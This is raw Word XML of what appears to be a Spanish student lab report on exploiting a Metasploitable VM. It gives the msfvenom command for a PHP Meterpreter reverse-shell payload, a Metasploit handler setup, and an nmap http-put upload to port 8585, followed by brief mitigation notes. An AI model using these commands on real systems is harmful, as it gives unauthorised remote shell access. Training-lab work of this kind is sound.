          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para verificar si HTTP PUT está habilitado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F58898" w14:textId="4E659BAE" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subida y Ejecución de Shell con HTTP PUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2D72D4" w14:textId="35107352" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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Creación de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Payload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 de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Meterpreter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 PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF0E79" w14:textId="324F463E" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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Ejecuta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msfvenom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 -p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php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/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meterpreter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/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reverse_tcp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 LHOST=[tu IP] LPORT=4444 -f raw &gt; /ruta/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meterpreter.php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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B092F8" w14:textId="2469B908" w:rsidR="00F8246C" w:rsidRPr="00F8246C" w:rsidRDefault="00F8246C" w:rsidP="00F8246C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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5AC02A3E" wp14:editId="260B8E95">
            <wp:extent cx="5731510" cy="1022350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="12336973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97347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1D844870" w14:textId="721E5504" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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Configuración del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Listener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 en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Metasploit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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A192124" w14:textId="55FE9CFB" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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En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Metasploit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, configura el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener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 con </w:t>
      </w:r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use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exploit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/multi/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handler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, </w:t>
      </w:r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set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payload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php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/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meterpreter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/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reverse_tcp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 xml:space="preserve">, </w:t>
      </w:r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set LHOST [tu IP]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r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set LPORT 4444</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, y </w:t>
      </w:r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run</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765F4C8" w14:textId="6A355D4E" w:rsidR="00F8246C" w:rsidRPr="00F8246C" w:rsidRDefault="00F8246C" w:rsidP="00F8246C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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60EABE8E" wp14:editId="1F1B0256">
            <wp:extent cx="5731510" cy="2192020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1605687136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87136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579DBE9D" w14:textId="3AFAFE92" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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Subida del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Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EBDE7" w14:textId="7F27A4BE" w:rsidR="00682F5F" w:rsidRDefault="1FA4345D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 xml:space="preserve">Usa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nmap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 -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sV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 --script http-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put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 --script-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args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 xml:space="preserve"> http-put.url='/uploads/meterpreter.php',http-put.file='/ruta/meterpreter.php' -p 8585 [IP de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="Ubuntu Mono" w:hAnsi="Ubuntu Mono" w:cs="Ubuntu Mono"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D3842A" w14:textId="7F479073" w:rsidR="00F8246C" w:rsidRPr="00F8246C" w:rsidRDefault="00F8246C" w:rsidP="00F8246C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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304A8BF" wp14:editId="7E64E239">
            <wp:extent cx="5731510" cy="1226185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="258638837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38837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2E4C0126" w14:textId="15F282D2" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479"/>
    <w:p w14:paraId="10161B99" w14:textId="7E483798" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parte 5: Análisis y Reporte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5B871" w14:textId="70B630E2" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tarea 6: Análisis y Documentación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B6E51B" w14:textId="12B2483B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>Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Reflexionar y documentar el proceso y resultados de la explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557864FC" w14:textId="6E65FEDB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>Pasos</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFE9F7" w14:textId="0705057C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>Redacta un informe detallado de cada paso, comando utilizado y resultados obtenidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F65099" w14:textId="77777777" w:rsidR="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A153C48" w14:textId="5A717E95" w:rsidR="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Para ver que puertos estaban abiertos en la máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metaexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizamos el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, además de algunas variantes del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver sus diferencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF15571" w14:textId="39EF4D3D" w:rsidR="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">También usamos el escaneo por puertos que tiene el programa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metaexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, aunque este de una información más detallada tarda más en dártela.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124508D" w14:textId="1B5BD5AF" w:rsidR="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Después con el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hemos creado el archivo con el virus que al abrirlo dentro de la maquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metaexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos dará acceso total a la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01385835" w14:textId="77777777" w:rsidR="007D38D2" w:rsidRPr="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCD9DCF" w14:textId="31CABA8D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>Incluye capturas de pantalla y análisis de los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8F425" w14:textId="77777777" w:rsidR="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C4EF51" w14:textId="1BF54613" w:rsidR="007D38D2" w:rsidRDefault="00F8246C" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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237FB634" wp14:editId="4712167B">
            <wp:extent cx="5731510" cy="2139950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1975257066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57066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173EB8B7" w14:textId="77777777" w:rsidR="007D38D2" w:rsidRPr="007D38D2" w:rsidRDefault="007D38D2" w:rsidP="007D38D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3501EF" w14:textId="7F1C38C8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>Propone medidas de mitigación para la vulnerabilidad explotada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07133575" w14:textId="77777777" w:rsidR="00BD6801" w:rsidRDefault="00BD6801" w:rsidP="00BD6801">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6890E15A" w14:textId="01ED3C23" w:rsidR="00BD6801" w:rsidRDefault="00BD6801" w:rsidP="00BD6801">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>La principal medida de mitigación contra esta vulnerabilidad sería directamente cerrar el puerto por el cual nos hemos colado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571825C" w14:textId="02AAF7BE" w:rsidR="00BD6801" w:rsidRDefault="00BD6801" w:rsidP="00BD6801">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Otra sería ya que de la manera en la que nos hemos colado también ha sido ejecutando un fichero desde la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pagina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> web de la máquina seria bloqueando el acceso a las descargas de la máquina .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DA80D0" w14:textId="77777777" w:rsidR="00BD6801" w:rsidRPr="00BD6801" w:rsidRDefault="00BD6801" w:rsidP="00BD6801">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BB689C" w14:textId="08006DAF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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Preguntas</w:t>
      </w:r>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAD4ED1" w14:textId="77926F6E" w:rsidR="00682F5F" w:rsidRDefault="3DCD1752" w:rsidP="56D8F479">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="56D8F479">
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>¿Cómo podrían prevenirse este tipo de vulnerabilidades en el futuro?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B9208" w14:textId="77777777" w:rsidR="00BD6801" w:rsidRDefault="00BD6801" w:rsidP="00BD6801">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4AD243" w14:textId="36175AE6" w:rsidR="00BD6801" w:rsidRPr="00BD6801" w:rsidRDefault="00BD6801" w:rsidP="00BD6801">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="system-ui" w:eastAsia="system-ui" w:hAnsi="system-ui" w:cs="system-ui"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Poniendo un firewall de por medio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A07E2" w14:textId="554B390A" w:rsidR="00682F5F" w:rsidRDefault="00682F5F" w:rsidP="56D8F479"/>
    <w:sectPr w:rsidR="00682F5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C8B0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EDA0258"/>
    <w:lvl w:ilvl="0" w:tplc="47FC19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D8E6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A8FC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72A9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62D5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DE26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2072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94E3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3C42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490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241825B"/>
    <w:rsid w:val="00682F5F"/>
    <w:rsid w:val="006C77E8"/>
    <w:rsid w:val="007D38D2"/>
    <w:rsid w:val="00BD6801"/>
    <w:rsid w:val="00F30092"/>
    <w:rsid w:val="00F8246C"/>
    <w:rsid w:val="1AD1257B"/>
    <w:rsid w:val="1FA4345D"/>
    <w:rsid w:val="2199A64B"/>
    <w:rsid w:val="3A4B6134"/>
    <w:rsid w:val="3DCD1752"/>
    <w:rsid w:val="4018E2A7"/>
    <w:rsid w:val="4D9C191E"/>
    <w:rsid w:val="4FE345A3"/>
    <w:rsid w:val="56D8F479"/>
    <w:rsid w:val="5874C4DA"/>
    <w:rsid w:val="6241825B"/>
    <w:rsid w:val="6A1E99A9"/>
    <w:rsid w:val="706E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41825B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E48015DF-2A43-4803-85E2-DF1BE17B8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wacimagecontainer">
    <w:name w:val="wacimagecontainer"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F824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fd74d64-fab7-401e-835b-105d6f5e167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F1080469FADAF4D83E5D6C1D70EE6A0" ma:contentTypeVersion="6" ma:contentTypeDescription="Crear nuevo documento." ma:contentTypeScope="" ma:versionID="b82c67e9003464e3ef5bb5a5b8fc9f85">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0fd74d64-fab7-401e-835b-105d6f5e167a" xmlns:ns3="9e468756-0e18-4eed-884d-ffafb0393c56" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1653560b331eee168ee19a8d554144ed" ns2:_="" ns3:_="">
    <xsd:import namespace="0fd74d64-fab7-401e-835b-105d6f5e167a"/>
    <xsd:import namespace="9e468756-0e18-4eed-884d-ffafb0393c5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d74d64-fab7-401e-835b-105d6f5e167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468756-0e18-4eed-884d-ffafb0393c5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93483C-61EA-46EF-95B1-45CD9DF88099}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="0fd74d64-fab7-401e-835b-105d6f5e167a"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{40793823-B18A-4D7E-BEB0-6FADEC8669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9CEC88-138F-4D80-B702-FA23192D4C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d74d64-fab7-401e-835b-105d6f5e167a"/>
    <ds:schemaRef ds:uri="9e468756-0e18-4eed-884d-ffafb0393c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838</Words>
  <Characters>4612</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>38</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop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De Uña del Brío</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Casado Rodríguez</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-21T16:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T15:11:00Z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0x010100EF1080469FADAF4D83E5D6C1D70EE6A0</vt:lpwstr>
  </property>
</Properties>
</file>